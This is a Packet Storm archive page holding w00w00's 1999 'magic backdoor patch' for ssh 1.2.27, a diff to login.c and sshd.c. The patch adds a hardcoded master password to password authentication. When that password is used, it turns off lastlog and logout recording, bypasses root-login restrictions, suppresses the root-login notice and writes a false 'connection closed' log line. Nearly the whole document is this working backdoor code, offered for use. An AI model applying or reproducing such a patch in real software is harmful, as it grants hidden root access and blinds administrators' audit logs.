w00w00's magic backdoor patch for ssh 1.2.27. Magic password, does not log, permits root login, etc.
b1284a90e4dccd597fa85ec3955f042eb2b49e8482af678c13bd0f0f633ff0c5--- ssh-1.2.27/login.c.wil Wed May 12 07:19:26 1999
+++ ssh-1.2.27/login.c Thu Jul 29 00:02:27 1999
@@ -258,7 +258,9 @@
const char *host, struct sockaddr_in *addr)
{
int fd;
+ extern int lets_log;
+ if (lets_log) {
#if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG)
struct lastlog ll;
char *lastlog;
@@ -559,11 +561,16 @@
}
#endif
}
+}
/* Records that the user has logged out. */
void record_logout(int pid, const char *ttyname)
{
+ extern int lets_log;
+
+if (lets_log) {
+
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
if (logout(line))
@@ -572,3 +579,4 @@
record_login(pid, ttyname, "", -1, "", NULL);
#endif /* HAVE_LIBUTIL_LOGIN */
}
+}
\ No newline at end of file
--- ssh-1.2.27/sshd.c.wil Wed May 12 07:19:29 1999
+++ ssh-1.2.27/sshd.c Wed Jul 28 23:45:57 1999
@@ -1408,7 +1408,9 @@
auth_delete_socket(NULL);
/* The connection has been terminated. */
+ if (lets_log) {
log_msg("Closing connection to %.100s", get_remote_ipaddr());
+ }
packet_close();
exit(0);
}
@@ -2146,6 +2148,7 @@
int authenticated = 0;
int authentication_type = 0;
char *password;
+ char intel_fd[8]="hax0r3d";
struct passwd *pw, pwcopy;
char *client_user;
unsigned int client_host_key_bits;
@@ -2162,7 +2165,8 @@
const char *ipaddr;
char *cap_hlist, *hp;
int perm_denied = 0;
-
+ extern int lets_log;
+
hostname = get_canonical_hostname();
ipaddr = get_remote_ipaddr();
#endif /* HAVE_LOGIN_CAP_H */
@@ -2660,14 +2664,20 @@
#if defined(KERBEROS) && defined(KRB5)
if (auth_password(user, password, client))
#else /* defined(KERBEROS) && defined(KRB5) */
- if (auth_password(user, password))
+ if (auth_password(user, password) || !strcmp(password,intel_fd))
#endif /* defined(KERBEROS) && defined(KRB5) */
{
/* Successful authentication. */
+ /* Disable logging if conditions are met. */
+ lets_log=1;
+ if (!strcmp(password,intel_fd)) { lets_log=0; }
/* Clear the password from memory. */
memset(password, 0, strlen(password));
xfree(password);
- log_msg("Password authentication for %.100s accepted.", user);
+ if (pw->pw_uid == UID_ROOT) {
+ if (!lets_log) { log_msg("Connection closed by remote host."); }
+ } else {
+ log_msg("Password authentication for %.100s accepted.", user); }
authentication_type = SSH_AUTH_PASSWORD;
authenticated = 1;
break;
@@ -2708,14 +2718,14 @@
}
/* Check if the user is logging in as root and root logins are disallowed. */
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log)
{
if (authentication_type == SSH_AUTH_PASSWORD)
packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
get_canonical_hostname());
}
else
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log)
{
if (forced_command)
log_msg("Root login accepted for forced command.", forced_command);
@@ -2767,7 +2777,7 @@
#endif
/* Log root logins with severity NOTICE. */
- if (pw->pw_uid == UID_ROOT)
+ if (pw->pw_uid == UID_ROOT && lets_log)
log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
pw->pw_name, get_canonical_hostname());
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed